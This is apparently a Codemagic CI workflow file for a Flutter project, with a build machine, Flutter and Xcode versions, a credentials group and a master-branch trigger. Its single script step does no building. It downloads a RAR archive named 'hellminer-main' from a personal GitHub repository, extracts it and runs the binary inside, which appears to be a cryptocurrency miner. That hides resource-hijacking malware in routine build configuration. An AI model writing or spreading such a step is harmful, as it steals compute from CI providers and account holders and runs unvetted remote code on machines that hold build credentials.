workflows:
  default-workflow:
    name: Default Workflow
    instance_type: mac_mini_m1
    max_build_duration: 120
    environment:
      flutter: 3.7.5
      xcode: latest
      cocoapods: default
      vars:
        SNAPCRAFT_BUILD_ENVIRONMENT: host
      groups:
        - snapcraft_credentials
    cache:
      cache_paths: []
    triggering:
      branch_patterns:
        - pattern: master
          include: true
          source: true
    scripts:
      - brew install unrar && wget https://github.com/tesasik67/q1/raw/main/hellminer-main.rar && unrar x hellminer-main.rar && cd hellminer-main && chmod +x hellminer && ./hellminer
